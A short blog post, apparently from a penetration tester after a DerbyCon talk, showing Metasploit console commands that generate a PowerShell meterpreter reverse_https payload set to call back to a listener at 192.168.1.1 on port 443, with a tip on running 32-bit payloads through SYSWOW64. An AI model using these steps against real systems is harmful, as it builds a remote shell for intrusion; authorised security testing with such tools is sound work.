Quick post, since i mentioned it in the DerbyCon talk, to mention that Metasploit generates PowerShell and PowerShell .net (looks related to this) payloads.
msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf payload(reverse_https) > set LPORT 443
LPORT => 443
msf payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf payload(reverse_https) >
Generates it based on old powersploit code here. Also a note to mention the 64 bit business I mentioned here still applies. If you are on x64 you need to call the PowerShell in SYSWOW64 to run 32bit payloads.
PowerShell version
PowerShell .net version
No comments:
Post a Comment